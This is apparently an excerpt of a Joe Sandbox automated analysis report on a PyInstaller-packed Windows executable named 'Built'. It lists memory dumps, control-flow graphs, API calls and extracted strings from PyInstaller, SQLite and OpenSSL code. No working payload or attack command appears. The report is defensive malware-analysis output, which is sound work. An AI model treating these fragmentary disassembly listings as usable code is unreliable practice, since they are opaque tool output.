                                                              • Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                              • API String ID: 4069847057-3030769715
                                                              • Opcode ID: 3e6155f2c061cdf16a58c9cbfd482980749103d55c62b2cd3a361ebb4869f036
                                                              • Instruction ID: f9a1caecfb86eaa7065902475d133ac0072e119749ffafbfa8197de18b971f49
                                                              • Opcode Fuzzy Hash: 3e6155f2c061cdf16a58c9cbfd482980749103d55c62b2cd3a361ebb4869f036
                                                              • Instruction Fuzzy Hash: CD928F72B09B4682EF69CF459460A78A3A8FB94B88F184035DE6D477D8DF3ED981C740

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 651 7ff626641950-7ff62664198b call 7ff6266445b0 654 7ff626641991-7ff6266419d1 call 7ff626647f80 651->654 655 7ff626641c4e-7ff626641c72 call 7ff62664c5c0 651->655 660 7ff6266419d7-7ff6266419e7 call 7ff626650744 654->660 661 7ff626641c3b-7ff626641c3e call 7ff6266500bc 654->661 666 7ff6266419e9-7ff626641a03 call 7ff626654f78 call 7ff626642910 660->666 667 7ff626641a08-7ff626641a24 call 7ff62665040c 660->667 665 7ff626641c43-7ff626641c4b 661->665 665->655 666->661 673 7ff626641a26-7ff626641a40 call 7ff626654f78 call 7ff626642910 667->673 674 7ff626641a45-7ff626641a5a call 7ff626654f98 667->674 673->661 681 7ff626641a5c-7ff626641a76 call 7ff626654f78 call 7ff626642910 674->681 682 7ff626641a7b-7ff626641afc call 7ff626641c80 * 2 call 7ff626650744 674->682 681->661 693 7ff626641b01-7ff626641b14 call 7ff626654fb4 682->693 696 7ff626641b16-7ff626641b30 call 7ff626654f78 call 7ff626642910 693->696 697 7ff626641b35-7ff626641b4e call 7ff62665040c 693->697 696->661 703 7ff626641b50-7ff626641b6a call 7ff626654f78 call 7ff626642910 697->703 704 7ff626641b6f-7ff626641b8b call 7ff626650180 697->704 703->661 710 7ff626641b8d-7ff626641b99 call 7ff626642710 704->710 711 7ff626641b9e-7ff626641bac 704->711 710->661 711->661 715 7ff626641bb2-7ff626641bb9 711->715 717 7ff626641bc1-7ff626641bc7 715->717 718 7ff626641bc9-7ff626641bd6 717->718 719 7ff626641be0-7ff626641bef 717->719 720 7ff626641bf1-7ff626641bfa 718->720 719->719 719->720 721 7ff626641bfc-7ff626641bff 720->721 722 7ff626641c0f 720->722 721->722 724 7ff626641c01-7ff626641c04 721->724 723 7ff626641c11-7ff626641c24 722->723 725 7ff626641c26 723->725 726 7ff626641c2d-7ff626641c39 723->726 724->722 727 7ff626641c06-7ff626641c09 724->727 725->726 726->661 726->717 727->722 728 7ff626641c0b-7ff626641c0d 727->728 728->723
                                                              APIs
                                                                • Part of subcall function 00007FF626647F80: _fread_nolock.LIBCMT ref: 00007FF62664802A
                                                              • _fread_nolock.LIBCMT ref: 00007FF626641A1B
                                                                • Part of subcall function 00007FF626642910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock$CurrentProcess
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 2397952137-3497178890
                                                              • Opcode ID: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
                                                              • Instruction ID: 721ca4d310a3b0555481ed9d439471ffb16e80f0896e4e527ae070d2dbcd9d4e
                                                              • Opcode Fuzzy Hash: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
                                                              • Instruction Fuzzy Hash: 81819071A0C68786EF20DB24E8612B963A0FF84784F404031D98DD7B86DE7EE585AF43

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: 689d6d22bbbe0075ee184b511634bee4b9e22409f5343f22a468899a6fe372b6
                                                              • Instruction ID: 00508e2fa628a3a4224fb5adf984a65d0b285a962d10c54d4631fa3a1e666b1c
                                                              • Opcode Fuzzy Hash: 689d6d22bbbe0075ee184b511634bee4b9e22409f5343f22a468899a6fe372b6
                                                              • Instruction Fuzzy Hash: 5241AC72A0864395EE20DB21EC511F9A390BF84784F444532ED1D97B96DE7EE542EF03

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 912 7ff626641210-7ff62664126d call 7ff62664bdf0 915 7ff626641297-7ff6266412af call 7ff626654fb4 912->915 916 7ff62664126f-7ff626641296 call 7ff626642710 912->916 921 7ff6266412b1-7ff6266412cf call 7ff626654f78 call 7ff626642910 915->921 922 7ff6266412d4-7ff6266412e4 call 7ff626654fb4 915->922 934 7ff626641439-7ff62664146d call 7ff62664bad0 call 7ff626654fa0 * 2 921->934 928 7ff626641309-7ff62664131b 922->928 929 7ff6266412e6-7ff626641304 call 7ff626654f78 call 7ff626642910 922->929 930 7ff626641320-7ff626641345 call 7ff62665040c 928->930 929->934 940 7ff62664134b-7ff626641355 call 7ff626650180 930->940 941 7ff626641431 930->941 940->941 948 7ff62664135b-7ff626641367 940->948 941->934 950 7ff626641370-7ff626641398 call 7ff62664a230 948->950 953 7ff626641416-7ff62664142c call 7ff626642710 950->953 954 7ff62664139a-7ff62664139d 950->954 953->941 955 7ff626641411 954->955 956 7ff62664139f-7ff6266413a9 954->956 955->953 958 7ff6266413ab-7ff6266413b9 call 7ff626650b4c 956->958 959 7ff6266413d4-7ff6266413d7 956->959 965 7ff6266413be-7ff6266413c1 958->965 960 7ff6266413d9-7ff6266413e7 call 7ff626669ea0 959->960 961 7ff6266413ea-7ff6266413ef 959->961 960->961 961->950 964 7ff6266413f5-7ff6266413f8 961->964 969 7ff62664140c-7ff62664140f 964->969 970 7ff6266413fa-7ff6266413fd 964->970 966 7ff6266413cf-7ff6266413d2 965->966 967 7ff6266413c3-7ff6266413cd call 7ff626650180 965->967 966->953 967->961 967->966 969->941 970->953 972 7ff6266413ff-7ff626641407 970->972 972->930
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2050909247-2813020118
                                                              • Opcode ID: 6d5808cc0d1dceb6cab22bc5ec620fda501ad4cc24dd5ec08cb7c541ead490ed
                                                              • Instruction ID: 515ac213b7c1416dcf2ad6108da10ef69b9e6f03d4c0f8439df40bd4a45c629f
                                                              • Opcode Fuzzy Hash: 6d5808cc0d1dceb6cab22bc5ec620fda501ad4cc24dd5ec08cb7c541ead490ed
                                                              • Instruction Fuzzy Hash: 2951D622A0864281EE709B16EC603BAA691FF85794F444131ED4DD7BC6EF7EE541EB03

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF626643804), ref: 00007FF6266436E1
                                                              • GetLastError.KERNEL32(?,00007FF626643804), ref: 00007FF6266436EB
                                                                • Part of subcall function 00007FF626642C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
                                                                • Part of subcall function 00007FF626642C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
                                                                • Part of subcall function 00007FF626642C50: MessageBoxW.USER32 ref: 00007FF626642D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 3187769757-2863816727
                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                              • Instruction ID: 45570c8619e57c85d043a01ff9e3b1bf66a306f24de0ca0e2fbf7e7fec32540f
                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                              • Instruction Fuzzy Hash: 47217E61B1C643D1FE30AB21FC603BA2251BF88344F404232D59DC26D5EE6EE504AB47

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1566 7ff62665bacc-7ff62665baf2 1567 7ff62665bb0d-7ff62665bb11 1566->1567 1568 7ff62665baf4-7ff62665bb08 call 7ff626654f58 call 7ff626654f78 1566->1568 1569 7ff62665bee7-7ff62665bef3 call 7ff626654f58 call 7ff626654f78 1567->1569 1570 7ff62665bb17-7ff62665bb1e 1567->1570 1582 7ff62665befe 1568->1582 1589 7ff62665bef9 call 7ff62665a950 1569->1589 1570->1569 1573 7ff62665bb24-7ff62665bb52 1570->1573 1573->1569 1577 7ff62665bb58-7ff62665bb5f 1573->1577 1579 7ff62665bb78-7ff62665bb7b 1577->1579 1580 7ff62665bb61-7ff62665bb73 call 7ff626654f58 call 7ff626654f78 1577->1580 1585 7ff62665bee3-7ff62665bee5 1579->1585 1586 7ff62665bb81-7ff62665bb87 1579->1586 1580->1589 1587 7ff62665bf01-7ff62665bf18 1582->1587 1585->1587 1586->1585 1590 7ff62665bb8d-7ff62665bb90 1586->1590 1589->1582 1590->1580 1593 7ff62665bb92-7ff62665bbb7 1590->1593 1594 7ff62665bbea-7ff62665bbf1 1593->1594 1595 7ff62665bbb9-7ff62665bbbb 1593->1595 1599 7ff62665bbc6-7ff62665bbdd call 7ff626654f58 call 7ff626654f78 call 7ff62665a950 1594->1599 1600 7ff62665bbf3-7ff62665bc1b call 7ff62665d66c call 7ff62665a9b8 * 2 1594->1600 1597 7ff62665bbbd-7ff62665bbc4 1595->1597 1598 7ff62665bbe2-7ff62665bbe8 1595->1598 1597->1598 1597->1599 1602 7ff62665bc68-7ff62665bc7f 1598->1602 1631 7ff62665bd70 1599->1631 1627 7ff62665bc1d-7ff62665bc33 call 7ff626654f78 call 7ff626654f58 1600->1627 1628 7ff62665bc38-7ff62665bc63 call 7ff62665c2f4 1600->1628 1605 7ff62665bcfa-7ff62665bd04 call 7ff62666398c 1602->1605 1606 7ff62665bc81-7ff62665bc89 1602->1606 1618 7ff62665bd0a-7ff62665bd1f 1605->1618 1619 7ff62665bd8e 1605->1619 1606->1605 1610 7ff62665bc8b-7ff62665bc8d 1606->1610 1610->1605 1614 7ff62665bc8f-7ff62665bca5 1610->1614 1614->1605 1620 7ff62665bca7-7ff62665bcb3 1614->1620 1618->1619 1624 7ff62665bd21-7ff62665bd33 GetConsoleMode 1618->1624 1622 7ff62665bd93-7ff62665bdb3 ReadFile 1619->1622 1620->1605 1625 7ff62665bcb5-7ff62665bcb7 1620->1625 1629 7ff62665bead-7ff62665beb6 GetLastError 1622->1629 1630 7ff62665bdb9-7ff62665bdc1 1622->1630 1624->1619 1632 7ff62665bd35-7ff62665bd3d 1624->1632 1625->1605 1626 7ff62665bcb9-7ff62665bcd1 1625->1626 1626->1605 1633 7ff62665bcd3-7ff62665bcdf 1626->1633 1627->1631 1628->1602 1638 7ff62665beb8-7ff62665bece call 7ff626654f78 call 7ff626654f58 1629->1638 1639 7ff62665bed3-7ff62665bed6 1629->1639 1630->1629 1635 7ff62665bdc7 1630->1635 1640 7ff62665bd73-7ff62665bd7d call 7ff62665a9b8 1631->1640 1632->1622 1637 7ff62665bd3f-7ff62665bd61 ReadConsoleW 1632->1637 1633->1605 1644 7ff62665bce1-7ff62665bce3 1633->1644 1646 7ff62665bdce-7ff62665bde3 1635->1646 1648 7ff62665bd63 GetLastError 1637->1648 1649 7ff62665bd82-7ff62665bd8c 1637->1649 1638->1631 1642 7ff62665bedc-7ff62665bede 1639->1642 1643 7ff62665bd69-7ff62665bd6b call 7ff626654eec 1639->1643 1640->1587 1642->1640 1643->1631 1644->1605 1652 7ff62665bce5-7ff62665bcf5 1644->1652 1646->1640 1654 7ff62665bde5-7ff62665bdf0 1646->1654 1648->1643 1649->1646 1652->1605 1659 7ff62665be17-7ff62665be1f 1654->1659 1660 7ff62665bdf2-7ff62665be0b call 7ff62665b6e4 1654->1660 1663 7ff62665be9b-7ff62665bea8 call 7ff62665b524 1659->1663 1664 7ff62665be21-7ff62665be33 1659->1664 1665 7ff62665be10-7ff62665be12 1660->1665 1663->1665 1667 7ff62665be35 1664->1667 1668 7ff62665be8e-7ff62665be96 1664->1668 1665->1640 1670 7ff62665be3a-7ff62665be41 1667->1670 1668->1640 1671 7ff62665be7d-7ff62665be88 1670->1671 1672 7ff62665be43-7ff62665be47 1670->1672 1671->1668 1673 7ff62665be49-7ff62665be50 1672->1673 1674 7ff62665be63 1672->1674 1673->1674 1675 7ff62665be52-7ff62665be56 1673->1675 1676 7ff62665be69-7ff62665be79 1674->1676 1675->1674 1677 7ff62665be58-7ff62665be61 1675->1677 1676->1670 1678 7ff62665be7b 1676->1678 1677->1676 1678->1668
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                              • Instruction ID: 7140218179b5e8749c6ea5133099ebce6bead08841de322266866f34a0a55e88
                                                              • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                              • Instruction Fuzzy Hash: 48C1C7A290C68781EF609B1598522BD7764FB81BC0F594131EA4E837D3CF7EE855AB03

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                              • API String ID: 2050909247-2434346643
                                                              • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                              • Instruction ID: b283aa1ef220967a4053d6e22b7cd11b26a61899172bbdd7b2bd60c6bb27fab1
                                                              • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                              • Instruction Fuzzy Hash: 5F419E31A0CA8791EE21DB20EC642E96325FB54384F904132EA5DC3695EF7DE615DB83
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007$B5630E103019
                                                              • String ID: -journal$immutable$nolock
                                                              • API String ID: 4161745878-4201244970
                                                              • Opcode ID: 30796456776be9dc827ca300266d4c86fcf3bc23ff0c8e6200e6eab160e0e5f7
                                                              • Instruction ID: c38ba439397d8917a40b1c93645105d1ba48f4dcde519064240058febf493d34
                                                              • Opcode Fuzzy Hash: 30796456776be9dc827ca300266d4c86fcf3bc23ff0c8e6200e6eab160e0e5f7
                                                              • Instruction Fuzzy Hash: 9952B362B09782AAEB578F299460B7976A9FF05B64F044234DA3E137E9DF3CE455C300
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s at line %d of [%.10s]$872ba256cbf61d9290b571c0e6d82a20c224ca3ad82971edc46b29818d5d17a0$database corruption
                                                              • API String ID: 0-2677786666
                                                              • Opcode ID: 5fb3990272c111cd25487c46920df837d9f802a995e9483821b62de2704db5e2
                                                              • Instruction ID: c6b9425c6f53c40f0f50b1717a16b6875a6cbc7c3c157894108df7ddf10d3257
                                                              • Opcode Fuzzy Hash: 5fb3990272c111cd25487c46920df837d9f802a995e9483821b62de2704db5e2
                                                              • Instruction Fuzzy Hash: 0E717022B08A4695FB678B16E460B7A77B5FB44B84F144035CA6D1B7E9DF3DE8818340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E103019FileRead
                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                              • API String ID: 3328485117-1843600136
                                                              • Opcode ID: 3db2b44528deea1de64595f08ae53bbd548d301079de3b61d8e3a0948f022bab
                                                              • Instruction ID: f9999c9894ef9b2dbfa8a0e212c84c8666b1ed0b69c2fa7e4ea4c0881d3b9d70
                                                              • Opcode Fuzzy Hash: 3db2b44528deea1de64595f08ae53bbd548d301079de3b61d8e3a0948f022bab
                                                              • Instruction Fuzzy Hash: C041F226B08A8382E7219F55E490DA97769FB84780F584132EE6E437ECDF3DE5468740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                              • Instruction ID: b669968a294d62a610042981cd76d72068ba7b7358f279315f5ff6592d131470
                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                              • Instruction Fuzzy Hash: 3841B222D2878283EB109B2199553797360FB947A4F108334EA9C43AD2DF7DB5E09B03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                              • Instruction ID: 5070e567eb79f1ce9303508210198623c0d947ba0dee6997caae636c2699bd51
                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                              • Instruction Fuzzy Hash: 3E314E20E4868385FE74AB249C723B92792BF41784F444435D94DC73D7DEAEA405EB63
                                                              APIs
                                                              • 00007FFE103019A0.VCRUNTIME140(?,?,?,?,00007FFDF150831D,?,?,?,?,00007FFDF1534917,?,?,?,00007FFDF150207B), ref: 00007FFDF15B9708
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093910912.00007FFDF1501000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDF1500000, based on PE: true
                                                              • Associated: 00000005.00000002.2093795866.00007FFDF1500000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF164D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1653000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093910912.00007FFDF1662000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095517324.00007FFDF1664000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000005.00000002.2095597643.00007FFDF1666000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1500000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E103019
                                                              • String ID: gfff
